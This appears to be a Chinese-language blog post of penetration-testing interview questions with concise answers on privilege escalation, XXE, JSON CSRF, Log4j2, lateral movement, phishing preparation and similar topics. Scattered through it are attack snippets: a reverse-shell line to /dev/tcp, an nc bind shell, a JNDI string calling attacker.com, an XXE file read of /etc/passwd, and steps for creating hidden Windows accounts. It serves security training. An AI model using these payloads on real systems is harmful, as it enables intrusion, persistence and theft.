網絡安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。
目錄
2025年滲透測試面試題總結-拷打題庫03
一、Windows與Linux系統提權思路
Windows提權
Linux提權
二、Python框架及漏洞
主流框架與漏洞
三、小程序與普通滲透的差異
四、App漏洞測試要點
五、IDS/IPS防護與繞過
防護原理
繞過思路
六、JSON相關漏洞
JSON CSRF利用
JSON數據包測試點
七、XXE漏洞原理與利用
原理
利用方式
八、內網信息收集
九、內網橫向探測方法
十、外網打點流程
十一、FOFA使用技巧
十二、CDN識別方法
十三、郵件釣魚準備
十四、CMS識別的意義
十五、Apache Log4j2漏洞原理
十六、水坑攻擊與魚叉攻擊對比
十七、判斷操作系統類型
十八、3389端口無法連接的原因
十九、建立隱藏用戶(Windows)
二十、MySQL無法連接的原因
二十一、文件上傳監測點
二十二、常見未授權訪問漏洞
二十三、危險函數列表
二十四、正反向Shell對比
二十六、Web TOP 10漏洞(OWASP 2023)
二十七、SQL注入類型
二十八、中間件及漏洞
二十九、目錄掃描工具
2025年滲透測試面試題總結-拷打題庫03
談一談Windows系統與Linux系統提權的思路? python有哪些框架,其中出現過哪些漏洞 小程序的滲透和普通滲透的差異 app本身的漏洞測試 IDS/IPS防護原理及繞過思路 json的csrf的利用 json格式的數據包可以測哪些漏洞 簡述xxe漏洞原理與利用方式 內網服務器,如何進行信息收集? 如果拿下了內網邊界層的某一個機器,如何對內網其他進行探測? 描述外網打點的流程? 舉幾個 FOFA 在外網打點過程中的使用小技巧? 如何識別CDN? 郵件釣魚的準備工作有哪些? 判斷出靶標的 CMS,對外網打點有什么意義? Apache Log4j2 的漏洞原理是什么? 水坑攻擊和魚叉攻擊的區別是什么? 如何判斷靶標站點是 windows/linux? 無法連接服務器 3389 端口的幾種情況? 如何建立隱藏用戶? 為什么 Mysql 數據庫的站點,無法連接? 文件上傳功能的監測點有哪些? 常見的未授權訪問漏洞有哪些? 代碼執行、文件讀取、命令執行的函數有哪些? 正向 shell 和反向 shell 的區別是什么? 正向代理和反向代理的區別? Web TOP 10 漏洞有哪些? SQL 注入的種類有哪些? 常見的中間件有哪些?他們有那些漏洞? 常見的目錄掃描工具有哪些?
一、Windows與Linux系統提權思路
Windows提權
- 漏洞利用:
- 利用未修補的系統漏洞(如MS17-010永恒之藍、CVE-2020-0796 SMBGhost)。
- 通過提權工具(如JuicyPotato、PrintSpoofer)濫用服務權限。
- 服務配置錯誤:
- 查找弱權限服務(
sc query
查看服務權限),通過修改可執行路徑或參數注入惡意代碼。- 利用AlwaysInstallElevated策略安裝惡意MSI包。
- 令牌竊取:
- 使用Mimikatz抓取內存中的管理員令牌或憑證(如Pass-the-Hash)。
- 計劃任務/啟動項:
- 劫持高權限計劃任務或注冊表啟動項(如
schtasks
)。Linux提權
- 內核漏洞:
- 利用CVE-2016-5195(DirtyCow)、CVE-2021-4034(PwnKit)等漏洞直接獲取root權限。
- SUID/SGID濫用:
- 查找具有SUID權限的可執行文件(
find / -perm -4000
),利用配置不當程序(如find
、vim
)執行命令。- 環境變量劫持:
- 通過
LD_PRELOAD
注入惡意動態庫,或劫持PATH路徑中的程序。- 定時任務(Cron):
- 檢查全局可寫的Cron腳本或路徑劫持(如利用通配符
*
的tar命令)。
二、Python框架及漏洞
主流框架與漏洞
- Django:
- CVE-2021-35042(URL路徑遍歷)、CVE-2019-14234(SQL注入)。
- Flask:
- 服務器端模板注入(SSTI)漏洞(如
{{ config.items() }}
泄露敏感信息)。- FastAPI:
- 依賴庫漏洞(如
ujson
反序列化問題)。- Pickle反序列化:
- 使用
pickle.loads
處理用戶輸入導致遠程代碼執行(RCE)。
三、小程序與普通滲透的差異
對比項 小程序滲透 普通Web滲透 入口點 微信/支付寶客戶端、云函數接口 傳統Web頁面、API接口 安全機制 HTTPS強制、Token鑒權、數據加密 依賴Cookie/Session、CORS策略 測試重點 云函數未授權、本地存儲泄露、接口越權 SQL注入、XSS、CSRF、文件上傳漏洞 逆向難度 需反編譯小程序包(如wxapkg) 直接分析前端代碼
四、App漏洞測試要點
- 本地存儲安全:
- 檢查
SharedPreferences
、SQLite數據庫明文存儲敏感數據。- 組件暴露:
- Android的Activity/Service導出導致未授權訪問(如
adb shell am start
)。- SSL Pinning繞過:
- 使用Frida或Xposed框架Hook證書驗證邏輯。
- API接口安全:
- 參數篡改(如修改用戶ID越權)、重放攻擊測試。
五、IDS/IPS防護與繞過
防護原理
- 簽名檢測:匹配已知攻擊特征(如SQL關鍵字
UNION SELECT
)。- 行為分析:檢測異常流量(如高頻登錄嘗試)。
繞過思路
- 混淆技術:
- 對Payload進行編碼(如Hex/Unicode/Base64)、分片傳輸。
- 協議濫用:
- 利用HTTP/2多路復用、分塊傳輸編碼(Chunked)繞過內容檢測。
- 慢速攻擊:
- 降低請求速率(如每秒1次)繞過閾值觸發。
六、JSON相關漏洞
JSON CSRF利用
- 條件:服務端未校驗
Content-Type
或依賴Cookie鑒權。- 構造Payload:
html<form action="http://target.com/api" method="POST" enctype="text/plain"> <input name='{"user":"attacker","csrf":"' value='test"}' type="hidden"> </form>
JSON數據包測試點
- XXE注入:
- 修改
Content-Type
為application/xml
,插入惡意實體。- JSONP劫持:
- 未校驗回調函數名(如
callback=alert(1)//
)。
七、XXE漏洞原理與利用
原理
- XML解析器未禁用外部實體引用,導致文件讀取或SSRF。
利用方式
xml<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <data>&xxe;</data>
- 防御:禁用DTD、使用JSON替代XML。
八、內網信息收集
- 網絡拓撲探測:
- 使用
arp-scan
、nbtscan
發現存活主機。- 服務枚舉:
- Nmap掃描端口(SMB 445、WinRM 5985、SSH 22)。
- 憑證獲取:
- 提取內存密碼(Mimikatz)、歷史命令記錄(
.bash_history
)。
九、內網橫向探測方法
- 代理搭建:
- 使用EarthWorm/reGeorg建立Socks代理穿透內網。
- 橫向移動:
- Pass-the-Ticket攻擊Kerberos服務、WMI遠程執行命令。
- 權限維持:
- 創建隱藏計劃任務、SSH公鑰植入。
十、外網打點流程
- 資產發現:
- 使用FOFA搜索
title="后臺管理"
、header="thinkphp"
。- 漏洞驗證:
- 優先測試歷史漏洞(如Log4j2、Shiro反序列化)。
- 權限獲取:
- 上傳Webshell、利用RCE漏洞反彈Shell。
十一、FOFA使用技巧
- 精準搜索:
title="登錄" && country="CN"
:定位中文登錄頁面。icon_hash="-123456"
:通過網站圖標識別特定資產。- 關聯分析:
cert="*.example.com"
:查找同一證書的關聯域名。
十二、CDN識別方法
- 多地Ping:
- 使用
ping
或在線工具(如ipip.net )檢測IP是否多地一致。- DNS歷史記錄:
- 通過SecurityTrails查看歷史解析記錄。
- 子域名探測:
- 主站使用CDN,但未備案的子域名可能直連真實IP。
十三、郵件釣魚準備
- 目標畫像:
- 收集目標郵箱、職位、社交動態(如LinkedIn)。
- 郵件偽造:
- 使用Swaks工具偽造發件人(如CEO@company.com )。
- Payload設計:
- 制作免殺宏文檔(VBA代碼混淆)、釣魚鏈接短鏈跳轉。
十四、CMS識別的意義
- 快速定位漏洞:
- 已知CMS(如WordPress、ThinkPHP)的公開漏洞可直接利用(如ThinkPHP 5.0 RCE)。
- 縮小攻擊面:
- 針對性掃描默認路徑(如
/wp-admin
)、插件目錄。
十五、Apache Log4j2漏洞原理
- 漏洞核心:JNDI注入,攻擊者通過
${jndi:ldap://attacker.com/exp}
觸發遠程類加載。- 影響范圍:所有使用Log4j2 2.0-beta9至2.14.1版本的應用。
十六、水坑攻擊與魚叉攻擊對比
對比項 水坑攻擊 魚叉攻擊 目標 特定群體(如企業員工) 特定個人(如高管) 手段 劫持目標常訪問的網站掛馬 定向發送釣魚郵件/文件 技術難度 需入侵高流量網站 依賴社會工程學精準偽裝
十七、判斷操作系統類型
- HTTP頭特征:
- Windows服務器可能返回
Server: Microsoft-IIS/10.0
。- 文件路徑差異:
- URL中出現
\
(如/images\test.jpg
)多為Windows。- 報錯信息:
- Linux錯誤提示包含
/var/log/
路徑。
十八、3389端口無法連接的原因
- 網絡層問題:
- 防火墻攔截(入站規則未放行3389)。
- 服務配置:
- 遠程桌面服務未啟動(
services.msc
檢查TermService)。- 認證限制:
- 僅允許特定用戶組連接(如Administrators)。
十九、建立隱藏用戶(Windows)
- 注冊表操作:
- 創建用戶后修改注冊表
HKLM\SAM\Domains\Account\Users
,將用戶鍵值設為與管理員相同的F
值。- 命令行隱藏:
- 使用
net user test$ /add
創建帶$
的用戶(部分工具不顯示)。
二十、MySQL無法連接的原因
- 權限限制:
- 用戶僅允許
localhost
訪問(檢查mysql.user
表)。- 網絡配置:
- MySQL綁定IP為127.0.0.1,拒絕外部連接。
- 防火墻攔截:
- 云服務器安全組未放行3306端口。
二十一、文件上傳監測點
- 類型校驗:
- 繞過黑名單(如上傳
.php5
、.phtml
)。- 內容檢測:
- 插入圖片馬繞過文件頭檢測(GIF89a)。
- 路徑控制:
- 利用目錄穿越(如
filename="../../test.php"
)。
二十二、常見未授權訪問漏洞
- Redis:
- 未設密碼,可直接寫入SSH公鑰或Webshell。
- MongoDB:
- 默認無需認證,導致數據泄露。
- Kubernetes API:
- 匿名訪問開啟,可創建惡意容器。
二十三、危險函數列表
漏洞類型 函數示例 代碼執行 eval()
、exec()
、popen()
文件讀取 file_get_contents()
、fopen()
命令執行 system()
、shell_exec()
二十四、正反向Shell對比
對比項 正向Shell 反向Shell 連接方向 攻擊者主動連接目標 目標主動連接攻擊者 適用場景 目標出站受限(如防火墻嚴格) 繞過目標入站限制 典型命令 nc -lvp 4444 -e /bin/sh
bash -i >& /dev/tcp/1.1.1.1/4444 0>&1
?
二十六、Web TOP 10漏洞(OWASP 2023)
- 失效的訪問控制(Broken Access Control)
- 加密機制缺失(Cryptographic Failures)
- 注入漏洞(Injection)
- 不安全設計(Insecure Design)
- 安全配置錯誤(Security Misconfiguration)
二十七、SQL注入類型
- 聯合查詢注入:
UNION SELECT
拼接數據。- 盲注(Boolean/Time):通過條件判斷或延時差異提取數據。
- 報錯注入:利用數據庫報錯回顯信息(如
updatexml()
)。
二十八、中間件及漏洞
- Apache:
- 解析漏洞(
.php.xxx
)、CVE-2021-41773(路徑遍歷)。- Nginx:
- 目錄穿越(CVE-2017-7529)、配置錯誤導致目錄列表。
- Tomcat:
- 弱口令爆破后臺、CVE-2020-1938(Ghostcat文件讀取)。
二十九、目錄掃描工具
- DirBuster:支持多線程、自定義字典。
- 御劍:快速掃描常見后臺路徑(如
/admin
)。- gobuster:基于Go語言,支持多種模式(dir、dns、vhost)。